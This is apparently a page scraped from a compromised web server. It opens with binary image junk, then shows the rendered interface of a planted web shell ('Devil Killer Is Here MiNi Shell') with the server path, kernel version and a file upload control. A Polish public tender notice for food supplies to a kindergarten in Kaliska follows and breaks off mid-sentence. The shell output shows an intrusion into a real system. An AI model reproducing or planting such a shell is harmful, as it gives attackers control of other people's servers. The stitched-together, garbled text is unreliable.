JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210608/0007542801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00075428 z dnia 2021-06-08</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup środków żywności wraz z<br/>dostawą do Samorządowego<br/>Przedszkola w Kaliskach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190576379</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Długa 53</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kaliska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-260</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">585889224</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@szkola.kaliska.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zspkaliska83.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup środków żywności wraz z<br/>dostawą do Samorządowego<br/>Przedszkola w Kaliskach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b5a12e56-bf9a-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00075428</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00006330/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Zakup środków żywności wraz z dostawą do Samorządowego Przedszkola w Kaliskach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Os.upr.do kont.z Wyk.jest Marlena<br/>Narloch.2.Postęp.prow.jest w jęz.pol.w for.elektr.za pośr.miniPortalu<br/>https://miniportal.uzp.gov.pl/,ePUAP https://epuap.gov.pl/wps/portal oraz<br/>poczt.elektr.zamowienia@szkola.kaliska.pl.3. Adres skrzynki ePUAP to:/ZSPkaliska83/skrytka.4.Zam.<br/>dopuszcza,opcjonalnie,kom. za pośrednictwem poczty elektr.Adres poczty elektr.osoby uprawnionej do<br/>kontaktu zWyk.:zamowienia@szkola.kaliska.pl.5.Wyk.zamierzający wziąć udział w postęp.o udzielenie<br/>zam.publ.musi posiadać konto na ePuap,Wyk.posiadający konto ePuap ma dostęp do<br/>form.:złożenia,zmiany,wycofania oferty oraz do form.do komunikacji.<br/>Z uwagi na ograniczenie ilości znaków w niniejszym<br/>ogłoszeniu Szczegółowe warunki opisane zostały w SWZ !!</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta,<br/>wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą<br/>zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub<br/>elektronicznym podpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych<br/>środków dowodowych na miniPortalu, kwalifikowany podpis elektroniczny lub podpis zaufany lub<br/>podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do<br/>systemu<br/>2. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot, na którego<br/>zdolnościach lub sytuacji polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą.<br/>Poprzez oryginał należy rozumieć dokument podpisany kwalifikowanym podpisem elektronicznym lub<br/>podpisem zaufanym lub podpisem osobistym przez osobę /osoby upoważnioną / upoważnione.<br/>Poświadczenie za zgodność z oryginałem następuje w formie elektronicznej podpisane kwalifikowanym<br/>podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę / osoby<br/>upoważnioną / upoważnione<br/>3. Oferta powinna być:<br/>a) sporządzona na podstawie załączników niniejszej SWZ w języku polskim,<br/>b) złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem<br/>https://miniportal.uzp.gov.pl/,<br/>c) podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem<br/>osobistym przez osobę / osoby upoważnioną / upoważnione.<br/>4. Podpisy kwalifikowane wykorzystywane przez Wykonawców do pospisywania wszelkich plików<br/>muszą spełniać „Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacjielektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym<br/>(eIDAS) (UE) nr 910/2014 – od 1 lipca 2016 roku”.<br/>5. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia<br/>1993r. o zwalczaniu nieuczciwej konkurencji, które wykonawca zastrzeże jako tajemnicę<br/>przedsiębiorstwa, powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem<br/>polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa:, a następnie wraz z plikami stanowiącymi<br/>jawną część skompresowane do jednego pliku archiwum(ZIP)<br/>6. Wykonawca składa ofertę za pośrednictwem Formularza do złożenia zmiany, wycofania oferty lub<br/>wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu. Klucz publiczny niezbędny<br/>do zaszyfrowania oferty przez Wykonawcę jest dostępny dla wykonawców na miniPortalu. W<br/>formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki Epuap, na którym prowadzona<br/>będzie korespondencja związana z postępowaniem.<br/>7. Wykonawca ma prawo złożyć tylko jedną ofertę dla danej części zamówienia. Złożenie większej<br/>liczby ofert dla danej części zamówienia lub oferty zawierającej rozwiązania alternatywne lub oferty<br/>wariantowej, spowoduje odrzucenie wszystkich ofert złożonych przez danego Wykonawcę dla danej<br/>części zamówienia.<br/>8. Wykonawca może przed upływem terminu do składania ofert zmienić lub wycofać ofertę za<br/>pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i<br/>udostępnionych również na miniPortalu. Sposób zmiany i wycofania oferty został opisany w Instrukcji<br/>użytkownika dostępnej na mniPortalu.<br/>9. Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać<br/>złożonej oferty.<br/>Z uwagi na ograniczenie ilości znaków w niniejszym<br/>ogłoszeniu Szczegółowe warunki opisane zostały w SWZ !!</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1)	administratorem Pani/Pana danych osobowych jest Zespół Szkół Publicznych <br/>w Kaliskach <br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: odo@szkola.kaliska.pl<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego. <br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, <br/>którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy PZP.<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy PZP., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. <br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO. <br/>8)	posiada Pani/Pan: <br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania <br/>o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy <br/>lub daty zakończonego postępowania o udzielenie zamówienia); <br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>9)	nie przysługuje Pani/Panu: <br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego <br/>na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 134200 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zakup o charakterze sukcesywnym artykułów spożywczych do Samorządowego Przedszkola Publicznego w Kaliskach, znajdującej się przy ul. Nowowiejskiej 3, 83-260 Kaliska. <br/><br/>Przedmiot zamówienia dotyczy części -1.	Zadanie 1 Mięso<br/><br/>Szczegółowe ilości opisane zostały w załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15113000-3 - Wieprzowina</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/> 1) Cena (C) – waga kryterium 60 % <br/> 2) Termin płatności faktury – waga kryterium 40 %<br/> Oddzielnie dla każdej części zamówienia.<br/>2.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/> Zasady oceny ofert w poszczególnych kryteriach: <br/>1)	Cena (C) – waga 60% <br/> cena najniższa brutto*<br/>C = --------------------------------------------------- x 100 x 60 % c<br/> cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a.	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym. <br/>b.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/><br/> 2) Termin płatności faktury – waga 40 %<br/> Termin płatności badanej oferty*<br/> T = ----------------------------------------------------------- x 100 x40 % <br/> Oferta z najdłuższym terminem płatności<br/><br/> *spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Wskazany termin płatności nie może być krótszy niż 14 dni i nie dłuższy niż 30 dni.<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma najwyższą liczbę punktów zgodnie z w/w wzorem: <br/>4.	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup o charakterze sukcesywnym artykułów spożywczych do Samorządowego Przedszkola Publicznego w Kaliskach, znajdującego się przy ul. Nowowiejskej 3, 83-260 Kaliska<br/>Przedmiot zamówienia dotyczy części -2.	Zadanie 2 Wędliny i drób<br/>Szczegółowe ilości opisane zostały w załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15112100-7 - Świeży drób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/> 1) Cena (C) – waga kryterium 60 % <br/> 2) Termin płatności faktury – waga kryterium 40 %<br/> Oddzielnie dla każdej części zamówienia.<br/>2.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/> Zasady oceny ofert w poszczególnych kryteriach: <br/>1)	Cena (C) – waga 60% <br/> cena najniższa brutto*<br/>C = --------------------------------------------------- x 100 x 60 % c<br/> cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a.	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym. <br/>b.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/><br/> 2) Termin płatności faktury – waga 40 %<br/> Termin płatności badanej oferty*<br/> T = ----------------------------------------------------------- x 100 x40 % <br/> Oferta z najdłuższym terminem płatności<br/><br/> *spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Wskazany termin płatności nie może być krótszy niż 14 dni i nie dłuższy niż 30 dni.<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma najwyższą liczbę punktów zgodnie z w/w wzorem: <br/>4.	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup o charakterze sukcesywnym artykułów spożywczych do Samorządowego Przedszkola Publicznego w Kaliskach, znajdującego się przy ul. Nowowiejskej 3, 83-260 Kaliska<br/>Przedmiot zamówienia dotyczy części -3.	Zadanie 3 Produkty spożywcze<br/>Szczegółowe ilości opisane zostały w załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/> 1) Cena (C) – waga kryterium 60 % <br/> 2) Termin płatności faktury – waga kryterium 40 %<br/> Oddzielnie dla każdej części zamówienia.<br/>2.	Ocena ofert zostanie dokonana wg poniższego 